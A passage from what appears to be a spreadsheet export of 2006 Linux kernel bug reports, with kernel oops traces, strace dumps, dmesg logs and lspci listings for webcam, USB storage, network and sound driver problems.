Plus... usb 1-1: Device not present usb 1-1: Device not present usb 1-1: V4L device deregistered: /dev/video0 Unable to handle kernel NULL pointer dereference at virtual address 0000000c printing eip: c0179236 *pde = 00000000 Oops: 0000 [#1] PREEMPT SMP Modules linked in: ovcamchip w9968cf compat_ioctl32 videodev i2c_core ipt_REJECT radeon drm thermal fan button processor ac battery ipt_MASQUERADE iptable_nat ip_nat ip_conntrack iptable_filter ip_tables usbhid snd_ca0106 snd_rawmidi snd_seq_device snd_ac97_codec snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd soundcore parport_pc snd_ac97_bus parport snd_page_alloc ide_cd pcspkr e100 floppy ohci_hcd usbcore cdrom CPU: 0 EIP: 0060:[&lt;c0179236&gt;] Not tainted VLI EFLAGS: 00010246 (2.6.15) EIP is at sysfs_hash_and_remove+0x32/0xf0 eax: 00000000 ebx: f6578ea0 ecx: c1955d40 edx: d9afa790 esi: f66dbea0 edi: f8959d20 ebp: f8959d9c esp: e57abf38 ds: 007b es: 007b ss: 0068 Process xawtv (pid: 20014, threadinfo=e57ab000 task=f7caaa70) Stack: f66dbea0 def2e910 00000000 f6578ea0 f66dbea0 f8959d20 f8959d9c c01f0458 00000000 f6578ea0 f8854bdd f36596b4 e72964d0 c01f04b0 e9721000 f89585e4 f89c5513 e9721000 e97218b0 f89c5a4d e7296534 f65cf320 c014dd8f c195a120 Call Trace: [&lt;c01f0458&gt;] class_device_del+0x88/0xd8 [&lt;c01f04b0&gt;] class_device_unregister+0x8/0x10 [&lt;f89585e4&gt;] video_unregister_device+0x3c/0x4a [videodev] [&lt;f89c5513&gt;] w9968cf_release_resources+0x69/0xc6 [w9968cf] [&lt;f89c5a4d&gt;] w9968cf_release+0x3d/0xd3 [w9968cf] [&lt;c014dd8f&gt;] __fput+0x8b/0x137 [&lt;c014c956&gt;] filp_close+0x4e/0x54 [&lt;c01026e7&gt;] sysenter_past_esp+0x54/0x75 Code: 89 44 24 04 89 14 24 8b 40 58 89 44 24 08 8b 44 24 04 8b 50 10 85 d2 0f 84 c4 00 00 00 f0 ff 4a 78 0f 88 c2 00 00 00 8b 44 24 08 &lt;8b&gt; 68 0c e9 85 00 00 00 83 7d 14 00 74 7c 89 e8 e8 e7 fe ff ff &lt;6&gt;usb 1-1: OV7620 image sensor initialized usb 1-1: USB disconnect, address 69 usb 1-1: Disconnecting Creative Labs Video Blaster WebCam Go Plus...</t>
  </si>
  <si>
    <t>Suspected scheduling starvation</t>
  </si>
  <si>
    <t>2006-01-12 11:59 UTC</t>
  </si>
  <si>
    <t>Heikki Orsila</t>
  </si>
  <si>
    <t>2006-03-22 03:46 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Gentoo Hardware Environment: Software Environment: Linux e275d 2.6.15-rc7 #1 Fri Dec 30 03:58:06 EET 2005 x86_64 AMD Athlon(tm) 64 Processor 3000+ AuthenticAMD GNU/Linux Gnu C 3.4.4 Gnu make 3.80 binutils 2.16.1 util-linux 2.12r mount 2.12r module-init-tools 3.0 e2fsprogs 1.38 jfsutils 1.1.8 reiserfsprogs line reiser4progs line xfsprogs 2.6.25 nfs-utils 1.0.6 Linux C Library 2.3.5 Dynamic linker (ldd) 2.3.5 Procps 3.2.5 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 udev 070 Modules Loaded The kernel does not have pre-empt and it has a 250 Hz timer. Problem Description: Currently firefox + X can starve two of my processes so that they do not get any timeslice during some wall clock seconds. I am getting huge buffer underruns when playing sound with uade123 (uade 2.01 at http://zakalwe.virtuaalipalvelin.net/uade/ ). uadecore process is attached to the uade123 by two pipes. uadecore synthesizes sound data and passes that data to uade123. uade123 pushes the sound data to libao which pushes it for ALSA. Here's a small strace dump of what happens when I open 3 tabs to firefox and push down ctrl-page up so that firefox starts to change tabs rapidly (consuming lots of CPU). Normally uadecore+uade123 consume only 4.0% of CPU but when starved they only get a fraction. 'make soundcheck' should produce the problem well. 22796 21:40:54 write(1, "Playing time position 2.9s in su"..., 60) = 60 22796 21:40:54 select(1, [0], NULL, NULL, {0, 0}) = 0 (Timeout) 22796 21:40:54 write(4, "\0\0\0\5\0\0\0\4\0\0\17\370", 12) = 12 22796 21:40:54 write(4, "\0\0\0\20\0\0\0\0", 8) = 8 22796 21:40:54 ioctl(6, 0x40184150, 0x7fffffc285b0) = 0 22796 21:40:54 read(5, &lt;unfinished ...&gt; * A full second without system calls 22797 21:40:56 &lt;... read resumed&gt; "\0\0\0\5\0\0\0\4", 8) = 8 22797 21:40:56 read(3, "\0\0\17\370", 4) = 4 22797 21:40:56 read(3, "\0\0\0\20\0\0\0\0", 8) = 8 22797 21:40:56 write(6, "\0\0\0\31\0\0\17\370\31\313\23\256\31\313\0261\31\313\$ 22796 21:40:56 &lt;... read resumed&gt; "\0\0\0\31\0\0\17\370", 8) = 8 22797 21:40:56 &lt;... write resumed&gt; ) = 4096 22796 21:40:56 read(5, "\31\313\23\256\31\313\0261\31\313\27&amp;\31\313\27\24\31\3$ 22796 21:40:56 read(5, &lt;unfinished ...&gt; 22797 21:40:56 write(6, "\0\0\0\20\0\0\0\0", 8 &lt;unfinished ...&gt; 22796 21:40:56 &lt;... read resumed&gt; "\0\0\0\20\0\0\0\0", 8) = 8 22797 21:40:56 &lt;... write resumed&gt; ) = 8 22796 21:40:56 write(1, "Playing time position 3.0s in su"..., 60) = 60 22796 21:40:56 select(1, [0], NULL, NULL, {0, 0}) = 0 (Timeout) 22796 21:40:56 write(4, "\0\0\0\5\0\0\0\4\0\0\17\370", 12) = 12 22796 21:40:56 write(4, "\0\0\0\20\0\0\0\0", 8) = 8 22796 21:40:56 ioctl(6, 0x40184150, 0x7fffffc285b0) = -1 EPIPE (Broken pipe) 22796 21:40:56 write(2, "ALSA: underrun, at least 0ms.\n", 30) = 30 22796 21:40:56 ioctl(6, 0x4140, 0x1e) = 0 22796 21:40:56 read(5, &lt;unfinished ...&gt; 22797 21:40:56 read(3, "\0\0\0\5\0\0\0\4", 8) = 8 22797 21:40:56 read(3, "\0\0\17\370", 4) = 4 22797 21:40:56 read(3, "\0\0\0\20\0\0\0\0", 8) = 8 22797 21:40:56 write(6, "\0\0\0\31\0\0\17\370\324Y\353C\324Y\352u\324Y\351(\324$ 22796 21:40:56 &lt;... read resumed&gt; "\0\0\0\31\0\0\17\370", 8) = 8 22797 21:40:56 &lt;... write resumed&gt; ) = 4096 22796 21:40:56 read(5, "\324Y\353C\324Y\352u\324Y\351(\324Y\347\250\324Y\3462\3$ 22796 21:40:56 read(5, &lt;unfinished ...&gt; 22797 21:40:56 write(6, "\0\0\0\20\0\0\0\0", 8 &lt;unfinished ...&gt; 22796 21:40:56 &lt;... read resumed&gt; "\0\0\0\20\0\0\0\0", 8) = 8 22797 21:40:56 &lt;... write resumed&gt; ) = 8 I think I need to try this on BSDs and 2.4.x kernel too, but I do not have such systems at hand. Steps to reproduce: 'make soundcheck' for uade123 (uade 2.01), open 3 tabs to firefox and press down ctrl-page up so that firefox switches tabs rapidly. This will cause huge underruns.</t>
  </si>
  <si>
    <t>Transcend CF pcmcia card no longer works</t>
  </si>
  <si>
    <t>2.6.13-rc7-2.6.15-git</t>
  </si>
  <si>
    <t>2006-01-13 04:09 UTC</t>
  </si>
  <si>
    <t>2008-02-18 08:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: It already occured in 2.6.13-rc7. Card definitely worked with 2.4, I think it worked with older 2.6's, too. Distribution: debian Hardware Environment: i386 Software Environment: Problem Description: Insert CF card. Two cards are detected: pccard: PCMCIA card inserted into slot 1 cs: memory probe 0xe8000000-0xefffffff: excluding 0xe8000000-0xefffffff cs: memory probe 0xc0200000-0xcfffffff: excluding 0xc0200000-0xc11fffff 0xc1a00000-0xc61fffff 0xc6a00000-0xc71fffff 0xc7a00000-0xc81fffff 0xc8a00000-0xc91fffff 0xc9a00000-0xca1fffff 0xcaa00000-0xcb1fffff 0xcba00000-0xcc1fffff 0xcca00000-0xcd1fffff 0xcda00000-0xce1fffff 0xcea00000-0xcf1fffff 0xcfa00000-0xd01fffff pcmcia: registering new device pcmcia1.0 Probing IDE interface ide2... hde: Transcend, CFA DISK drive hdf: probing with STATUS(0x50) instead of ALTSTATUS(0x0a) , ATA DISK drive ide2 at 0x4100-0x4107,0x410e on irq 7 hde: max request size: 128KiB hde: 503808 sectors (257 MB) w/0KiB Cache, CHS=984/16/32 hde: hde1 hdf: max request size: 128KiB hdf: 131584 sectors (67 MB) w/1028KiB Cache, CHS=2056/8/8 hdf:&lt;6&gt; hde:&lt;4&gt;hdf: lost interrupt hdf: lost interrupt hdf: lost interrupt hdf: lost interrupt hdf: lost interrupt pavel@amd:~$ ...but only hde is real. Mounting /dev/hde1 hangs. I think it will oops when I yank the card. If so, I'll attach it as a comment.</t>
  </si>
  <si>
    <t>drivers/usb/input/wacom.c fails to compile on powerpc due to symbol clash</t>
  </si>
  <si>
    <t>2.6.15-git</t>
  </si>
  <si>
    <t>2006-01-13 13:59 UTC</t>
  </si>
  <si>
    <t>2006-02-03 12:04 UTC</t>
  </si>
  <si>
    <t>This is very simple. Both include/asm-powerpc/cputable.h and drivers/usb/input/wacom.c define a symbol named G4. drivers/usb/input/wacom.c:98: error: redeclaration of enumerator "G4" include/asm/cputable.h:37: error: previous definition of "G4" was here</t>
  </si>
  <si>
    <t>modprobe it87 causes system to reboot</t>
  </si>
  <si>
    <t>2006-01-14 01:55 UTC</t>
  </si>
  <si>
    <t>drago01</t>
  </si>
  <si>
    <t>2008-05-18 16:15 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: Fedora Core 4 x86_64 Hardware Environment: (DFI LANPARTY NF4 SLI EXPERT) 00:00.0 Memory controller: nVidia Corporation CK804 Memory Controller (rev a3) 00:01.0 ISA bridge: nVidia Corporation CK804 ISA Bridge (rev a3) 00:01.1 SMBus: nVidia Corporation CK804 SMBus (rev a2) 00:02.0 USB Controller: nVidia Corporation CK804 USB Controller (rev a2) 00:02.1 USB Controller: nVidia Corporation CK804 USB Controller (rev a3) 00:06.0 IDE interface: nVidia Corporation CK804 IDE (rev a2) 00:07.0 IDE interface: nVidia Corporation CK804 Serial ATA Controller (rev a3) 00:08.0 IDE interface: nVidia Corporation CK804 Serial ATA Controller (rev a3) 00:09.0 PCI bridge: nVidia Corporation CK804 PCI Bridge (rev a2) 00:0a.0 Bridge: nVidia Corporation CK804 Ethernet Controller (rev a3) 00:0b.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) 00:0c.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) 00:0d.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) 00:0e.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 01:07.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 0a) 01:07.1 Input device controller: Creative Labs SB Live! MIDI/Game Port (rev 0a) 01:09.0 FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev 80) 01:0a.0 Ethernet controller: Marvell Technology Group Ltd. 88E8001 Gigabit Ethernet Controller (rev 13) 05:00.0 VGA compatible controller: nVidia Corporation GeForce 7800 GTX (rev a1) Software Environment: lm_sensors-2.9.1-3.FC4.2 Problem Description: I bought a new mobo and did sensors-detect but my system got frozen. so I decided to load the module by hand and did modprobe it87 and the system imeadetly rebooted. Tryed again, flashed new bios always the same. whats wrong? any info that I can provide to help debuging this? Steps to reproduce: modprobe it87</t>
  </si>
  <si>
    <t>Driver sk98lin not working (no communication with other node)</t>
  </si>
  <si>
    <t>2006-01-14 10:22 UTC</t>
  </si>
  <si>
    <t>Jaroslav Prodelal</t>
  </si>
  <si>
    <t>2006-01-18 07:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13.3 (no more recent version we use) Distribution: CentOS 4.2 Hardware Environment: AMD Athlon(tm) 64 X2 Dual Core Processor 4400+, 4GB RAM, NVidida NFORCE3 network card, Yukon Gigabit Ethernet 10/100/1000Base-T Adapter Software Environment: Problem Description: The driver is properly loaded and device is also properly configured, but I can't ping other node (device is used to P2P connection only). When I try to use tcpdump on that interface, I can see outgoing packets to other node and rarely some strange message are display on other node when I use tcpdump on pair device there: ... 19:10:36.903542 IP truncated-ip - 38 bytes missing! 10.99.0.1 &gt; 10.99.0.2: icmp 64: echo request seq 6 19:10:37.913470 IP truncated-ip - 38 bytes missing! 10.99.0.1 &gt; 10.99.0.2: icmp 64: echo request seq 6 19:10:39.881524 IP 10.99.0.1 &gt; 10.99.0.2: icmp 64: echo request seq 6 19:10:46.903458 IP 10.99.0.1 &gt; 10.99.0.2: icmp 64: echo request seq 6 19:10:46.920733 IP truncated-ip - 38 bytes missing! 10.99.0.1 &gt; 10.99.0.2: icmp 64: echo request seq 6 19:11:05.901484 IP 10.99.0.1 &gt; 10.99.0.2: icmp 64: echo request seq 34 ... When I leave program ping to tries ping from bad node, sometimes I can see message like this: 64 bytes from 10.99.0.2: icmp_seq=182 ttl=64 time=3981 ms wrong data byte #20 should be 0x14 but was 0x0 #16 10 11 12 13 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 #48 0 0 0 0 0 0 0 0 64 bytes from 10.99.0.2: icmp_seq=182 ttl=64 time=5021 ms (DUP!) wrong data byte #20 should be 0x14 but was 0x0 #16 10 11 12 13 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 #48 0 0 0 0 0 0 0 0 dmesg output when I load driver: ACPI: PCI Interrupt 0000:05:0c.0[A] -&gt; Link [APC2] -&gt; GSI 17 (level, low) -&gt; IRQ 233 ACPI: PCI Interrupt 0000:05:0c.0[A] -&gt; Link [APC2] -&gt; GSI 17 (level, low) -&gt; IRQ 233 eth0: Yukon Gigabit Ethernet 10/100/1000Base-T Adapter PrefPort:A RlmtMode:Check Link State ADDRCONF(NETDEV_UP): eth0: link is not ready eth0: network connection up using port A speed: 1000 autonegotiation: yes duplex mode: full flowctrl: symmetric role: slave irq moderation: disabled scatter-gather: enabled ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready I have compiled driver from manufacturer site (http://www.syskonnect.com/syskonnect/support/driver/htm/sk9elin.htm) and it is working correctly. Packets are transmitted. dmesg output of selfcompiled driver downloaded from manufacturer site: sk98lin: Network Device Driver v8.28.1.3 (C)Copyright 1999-2005 Marvell(R). ACPI: PCI Interrupt 0000:05:0c.0[A] -&gt; Link [APC2] -&gt; GSI 17 (level, low) -&gt; IRQ 233 eth0: Yukon Gigabit Ethernet 10/100/1000Base-T Adapter PrefPort:A RlmtMode:Check Link State ADDRCONF(NETDEV_UP): eth0: link is not ready eth0: network connection up using port A speed: 1000 autonegotiation: yes duplex mode: full flowctrl: symmetric role: slave irq moderation: disabled scatter-gather: enabled tx-checksum: enabled rx-checksum: enabled rx-polling: enabled ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready ---- But with selfcompiled driver another problem exits. When I load drbd module (www.drbd.org), I can't do ping as well and there is no connection between theses nodes. --- In the past, I have also problems with drbd and sk98lin, but only with selfcompiled sk98lin module on kernel 2.6.13.3. There were kernel panic every time I load sk98lin driver. But it works correctly with included driver from 2.6.13.3 ---- So, the major problem is, that sk98lin module doesn't work for me on 2.6.15 and also, that manufacturer driver doesn't work with drbd, but it is not your problem, I think?! ---- If think I send all information I could, if I can send more, please let me knoe which and how to do that. Steps to reproduce: Just try ping to some node from machine with this network card.</t>
  </si>
  <si>
    <t>usb-storage freezes during large file transfers</t>
  </si>
  <si>
    <t>2006-01-14 21:26 UTC</t>
  </si>
  <si>
    <t>Paul</t>
  </si>
  <si>
    <t>2007-07-15 06:56 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: dont know Distribution: FC4 Hardware Environment: i686 Software Environment: FC4 Problem Description: I have a bunch of 300MB video files on a fairly new USB 2.0 Hard Disk, formatted FAT-32 by Seagate's own software. The HD is always plugged in. PC is dual boot. In Windows XP, everything works just fine, and I can watch video from the HDD without interruptions and copy files fine as well. In 2.6.15, when I try to watch a video file, or copy one of the 300MB files to another IDE disk drive, I get frequent problems. To reproduce, I try to copy three 300MB files from my USB-HD to my IDE-HD. The problem will always occur about once during one of those 3 transfers. The transfer will stall for about 30-40 seconds, and then maybe resume (or if being transferred via samba, samba just gives up.) If watching in mplayer, everything is fine until one of these freezes occur. If in mplayer's fullscreen mode, the keyboard &amp; mouse stop responding, and I have to either wait about 40 seconds, or CTRL-ALT-BKSP to kill the X-server, or CTRL-ALT-F1 to swicth to terminal. Steps to reproduce: mount a USB harddrive and try to copy about 1GB worth of data from the drive. The transfer will start and finish quickly, but there will be a 40 second pause in the middle. I turned on USB verbose logging, here's my messages [note, the askewedness of the usb-storage log entries]. The freeze-up occured during a read at about Jan 14 23:53 : Jan 14 23:45:24 titan kernel: klogd 1.4.1, log source = /proc/kmsg started. Jan 14 23:45:24 titan kernel: CI Host Controller Jan 14 23:45:24 titan kernel: ohci_hcd 0000:00:0d.0: new USB bus registered, assigned bus number 2 Jan 14 23:45:24 titan kernel: ohci_hcd 0000:00:0d.0: irq 17, io mem 0xdb008000 Jan 14 23:45:24 titan kernel: usb usb2: Product: OHCI Host Controller Jan 14 23:45:24 titan kernel: usb usb2: Manufacturer: Linux 2.6.15 ohci_hcd Jan 14 23:45:24 titan kernel: usb usb2: SerialNumber: 0000:00:0d.0 Jan 14 23:45:24 titan kernel: hub 2-0:1.0: USB hub found Jan 14 23:45:24 titan kernel: hub 2-0:1.0: 2 ports detected Jan 14 23:45:24 titan kernel: ACPI: PCI Interrupt 0000:00:0d.1[C] -&gt; GSI 19 (level, low) -&gt; IRQ 19 Jan 14 23:45:24 titan kernel: ohci_hcd 0000:00:0d.1: OHCI Host Controller Jan 14 23:45:24 titan kernel: ohci_hcd 0000:00:0d.1: new USB bus registered, assigned bus number 3 Jan 14 23:45:24 titan kernel: ohci_hcd 0000:00:0d.1: irq 19, io mem 0xdb009000 Jan 14 23:45:24 titan kernel: usb usb3: Product: OHCI Host Controller Jan 14 23:45:24 titan kernel: usb usb3: Manufacturer: Linux 2.6.15 ohci_hcd Jan 14 23:45:24 titan kernel: usb usb3: SerialNumber: 0000:00:0d.1 Jan 14 23:45:24 titan kernel: hub 3-0:1.0: USB hub found Jan 14 23:45:24 titan kernel: hub 3-0:1.0: 2 ports detected Jan 14 23:45:24 titan kernel: usb 1-6: new high speed USB device using ehci_hcd and address 2 Jan 14 23:45:24 titan kernel: ACPI: PCI Interrupt 0000:00:0d.2[D] -&gt; GSI 16 (level, low) -&gt; IRQ 16 Jan 14 23:45:24 titan kernel: ohci_hcd 0000:00:0d.2: OHCI Host Controller Jan 14 23:45:24 titan kernel: ohci_hcd 0000:00:0d.2: new USB bus registered, assigned bus number 4 Jan 14 23:45:24 titan kernel: ohci_hcd 0000:00:0d.2: irq 16, io mem 0xdb00a000 Jan 14 23:45:24 titan kernel: usb usb4: Product: OHCI Host Controller Jan 14 23:45:24 titan kernel: usb usb4: Manufacturer: Linux 2.6.15 ohci_hcd Jan 14 23:45:24 titan kernel: usb usb4: SerialNumber: 0000:00:0d.2 Jan 14 23:45:24 titan kernel: hub 4-0:1.0: USB hub found Jan 14 23:45:24 titan kernel: hub 4-0:1.0: 2 ports detected Jan 14 23:45:24 titan kernel: usb 1-6: Product: External HDD Jan 14 23:45:24 titan kernel: usb 1-6: Manufacturer: Western Digital Jan 14 23:45:24 titan kernel: usb 1-6: SerialNumber: 57442D5743414C3736313631333830 Jan 14 23:45:24 titan kernel: Initializing USB Mass Storage driver... Jan 14 23:45:24 titan kernel: scsi0 : SCSI emulation for USB Mass Storage devices Jan 14 23:45:24 titan kernel: usbcore: registered new driver usb-storage Jan 14 23:45:24 titan kernel: USB Mass Storage support registered. Jan 14 23:45:24 titan kernel: Freeing unused kernel memory: 144k freed Jan 14 23:45:25 titan kernel: Vendor: WD Model: 2500JB External Rev: 0602 Jan 14 23:45:25 titan kernel: Type: Direct-Access ANSI SCSI revision: 00 Jan 14 23:45:25 titan kernel: SCSI device sda: 488397168 512-byte hdwr sectors (250059 MB) Jan 14 23:45:25 titan kernel: sda: assuming drive cache: write through Jan 14 23:45:25 titan kernel: SCSI device sda: 488397168 512-byte hdwr sectors (250059 MB) Jan 14 23:45:25 titan kernel: sda: assuming drive cache: write through Jan 14 23:45:25 titan kernel: sda:&lt;7&gt;usb-storage: queuecommand called Jan 14 23:45:25 titan kernel: sda1 Jan 14 23:45:25 titan kernel: sd 0:0:0:0: Attached scsi disk sda Jan 14 23:51:07 titan su(pam_unix)[3718]: session opened for user root by (uid=500) Jan 14 23:52:29 titan kernel: nsfer complete Jan 14 23:52:30 titan kernel: storage: Bulk Status S 0x53425355 T 0x1f13 R 0 Stat 0x0 Jan 14 23:52:34 titan kernel: plete Jan 14 23:52:34 titan kernel: lete Jan 14 23:53:02 titan kernel: &lt;7rage: Bulk Status S 0x53425355 T 0x2b19 R 0 Stat 0x0 Jan 14 23:53:03 titan kernel: plete Jan 14 23:53:03 titan kernel: e: Bulk Command S 0x43425355 T 0x2c7a L 65536 F 128 Trg 0 LUN 0 CL 10 Jan 14 23:53:04 titan kernel: : Bulk Status S 0x53425355 T 0x2ca3 R 0 Stat 0x0 Jan 14 23:53:04 titan kernel: plete Jan 14 23:53:23 titan kernel: lk data transfer result 0x0 Jan 14 23:53:23 titan kernel: &lt;7plete Jan 14 23:53:25 titan kernel: &lt;7ulk data transfer result 0x0 Jan 14 23:53:27 titan kernel: : Bulk Status S 0x53425355 T 0x37ba R 0 Stat 0x0 Jan 14 23:53:28 titan kernel: &lt;7ulk data transfer result 0x0 Jan 14 23:53:29 titan kernel: &lt;7plete Jan 14 23:53:30 titan kernel: &lt;: Bulk Status S 0x53425355 T 0x3a0b R 0 Stat 0x0 Jan 14 23:53:32 titan kernel: rage: Bulk Status S 0x53425355 T 0x3bbf R 0 Stat 0x0 Jan 14 23:53:32 titan kernel: &lt;7torage: Bulk Status S 0x53425355 T 0x3c47 R 0 Stat 0x0 Jan 14 23:53:34 titan kernel: &lt;7age: Bulk Status S 0x53425355 T 0x3dd7 R 0 Stat 0x0 Jan 14 23:53:36 titan kernel: &lt;7orage: Bulk data transfer result 0x0 Jan 14 23:53:36 titan kernel: sfer complete Jan 14 23:53:36 titan kernel: &lt;7plete Jan 14 23:53:38 titan kernel: &lt;7 Bulk Status S 0x53425355 T 0x40e5 R 0 Stat 0x0 Here's my lspci -v: [root@titan paul]# lspci -v 00:00.0 Host bridge: Silicon Integrated Systems [SiS] 645xx (rev 02) Subsystem: Silicon Integrated Systems [SiS] 645xx Flags: bus master, medium devsel, latency 32 Memory at c0000000 (32-bit, non-prefetchable) [size=256M] Capabilities: [c0] AGP version 3.0 00:01.0 PCI bridge: Silicon Integrated Systems [SiS] Virtual PCI-to-PCI bridge (AGP) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 64 Bus: primary=00, secondary=01, subordinate=01, sec-latency=32 Memory behind bridge: d8000000-d9ffffff Prefetchable memory behind bridge: d0000000-d7ffffff 00:02.0 ISA bridge: Silicon Integrated Systems [SiS] SiS963 [MuTIOL Media IO] (rev 04) Flags: bus master, medium devsel, latency 0 00:02.1 SMBus: Silicon Integrated Systems [SiS] SiS961/2 SMBus Controller Flags: medium devsel I/O ports at 1400 [size=32] 00:02.5 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] (prog-if 80 [Master]) Subsystem: Silicon Integrated Systems [SiS] SiS5513 EIDE Controller (A,B step) Flags: bus master, medium devsel, latency 128 I/O ports at f000 [size=16] 00:02.7 Multimedia audio controller: Silicon Integrated Systems [SiS] Sound Controller (rev a0) Subsystem: Giga-byte Technology: Unknown device a002 Flags: bus master, medium devsel, latency 32, IRQ 17 I/O ports at d800 [size=256] I/O ports at dc00 [size=128] Capabilities: [48] Power Management version 2 00:0a.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 11) Subsystem: Hauppauge computer works Inc. WinTV Series Flags: bus master, medium devsel, latency 32, IRQ 17 Memory at db005000 (32-bit, prefetchable) [size=4K] Capabilities: [44] Vital Product Data Capabilities: [4c] Power Management version 2 00:0a.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11) Subsystem: Hauppauge computer works Inc. WinTV Series Flags: bus master, medium devsel, latency 32, IRQ 10 Memory at db006000 (32-bit, prefetchable) [size=4K] Capabilities: [44] Vital Product Data Capabilities: [4c] Power Management version 2 00:0c.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 30) Subsystem: 3Com Corporation 3C905B Fast Etherlink XL 10/100 Flags: bus master, medium devsel, latency 32, IRQ 16 I/O ports at e000 [size=128] Memory at db007000 (32-bit, non-prefetchable) [size=128] [virtual] Expansion ROM at 70000000 [disabled] [size=128K] Capabilities: [dc] Power Management version 1 00:0d.0 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) (prog-if 10 [OHCI]) Subsystem: ALi Corporation USB 1.1 Controller Flags: bus master, 66Mhz, medium devsel, latency 32, IRQ 17 Memory at db008000 (32-bit, non-prefetchable) [size=4K] Capabilities: [60] Power Management version 2 00:0d.1 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) (prog-if 10 [OHCI]) Subsystem: ALi Corporation USB 1.1 Controller Flags: bus master, 66Mhz, medium devsel, latency 32, IRQ 19 Memory at db009000 (32-bit, non-prefetchable) [size=4K] Capabilities: [60] Power Management version 2 00:0d.2 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) (prog-if 10 [OHCI]) Subsystem: ALi Corporation USB 1.1 Controller Flags: bus master, 66Mhz, medium devsel, latency 32, IRQ 16 Memory at db00a000 (32-bit, non-prefetchable) [size=4K] Capabilities: [60] Power Management version 2 00:0d.3 USB Controller: ALi Corporation USB 2.0 Controller (rev 01) (prog-if 20 [EHCI]) Subsystem: ALi Corporation USB 2.0 Controller Flags: bus master, 66Mhz, medium devsel, latency 32, IRQ 18 Memory at db00b000 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Capabilities: [58] Debug port 01:00.0 VGA compatible controller: nVidia Corporation NV35 [GeForce FX 5900XT] (rev a1) (prog-if 00 [VGA]) Flags: bus master, 66Mhz, medium devsel, latency 248, IRQ 16 Memory at d8000000 (32-bit, non-prefetchable) [size=16M] Memory at d0000000 (32-bit, prefetchable) [size=128M] [virtual] Expansion ROM at d9000000 [disabled] [size=128K] Capabilities: [60] Power Management version 2 Capabilities: [44] AGP version 3.0 [root@titan paul]# Thanks.</t>
  </si>
  <si>
    <t>With DVB drivers enabled  snd_87x (ALSA) don't detect Broooktree audio</t>
  </si>
  <si>
    <t>2006-01-15 03:52 UTC</t>
  </si>
  <si>
    <t>2006-02-02 05:57 UTC</t>
  </si>
  <si>
    <t>Manu Abraham</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Don't Know. Distribution: Debian unstable Hardware Environment: Ia have two video capture devices, a bttv (KW-TV878RF) and a bttv-DVB (AV711DVB) lspci 0000:00:00.0 Host bridge: Intel Corporation 82845 845 (Brookdale) Chipset Host Bridge (rev 03) 0000:00:01.0 PCI bridge: Intel Corporation 82845 845 (Brookdale) Chipset AGP Bridge (rev 03) 0000:00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev 12) 0000:00:1f.0 ISA bridge: Intel Corporation 82801BA ISA Bridge (LPC) (rev 12) 0000:00:1f.1 IDE interface: Intel Corporation 82801BA IDE U100 (rev 12) 0000:00:1f.2 USB Controller: Intel Corporation 82801BA/BAM USB (Hub #1) (rev 12) 0000:00:1f.3 SMBus: Intel Corporation 82801BA/BAM SMBus (rev 12) 0000:00:1f.4 USB Controller: Intel Corporation 82801BA/BAM USB (Hub #2) (rev 12) 0000:00:1f.5 Multimedia audio controller: Intel Corporation 82801BA/BAM AC'97 Audio (rev 12) 0000:01:00.0 VGA compatible controller: nVidia Corporation NV34 [GeForce FX 5200] (rev a1) 0000:02:0b.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 0000:02:0c.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 11) 0000:02:0c.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11) 0000:02:0d.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 11) 0000:02:0d.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11) 0000:02:0e.0 Network controller: RaLink Ralink RT2500 802.11 Cardbus Reference Card (rev 01) lspci -n 0000:00:00.0 0600: 8086:1a30 (rev 03) 0000:00:01.0 0604: 8086:1a31 (rev 03) 0000:00:1e.0 0604: 8086:244e (rev 12) 0000:00:1f.0 0601: 8086:2440 (rev 12) 0000:00:1f.1 0101: 8086:244b (rev 12) 0000:00:1f.2 0c03: 8086:2442 (rev 12) 0000:00:1f.3 0c05: 8086:2443 (rev 12) 0000:00:1f.4 0c03: 8086:2444 (rev 12) 0000:00:1f.5 0401: 8086:2445 (rev 12) 0000:01:00.0 0300: 10de:0322 (rev a1) 0000:02:0b.0 0200: 10ec:8139 (rev 10) 0000:02:0c.0 0400: 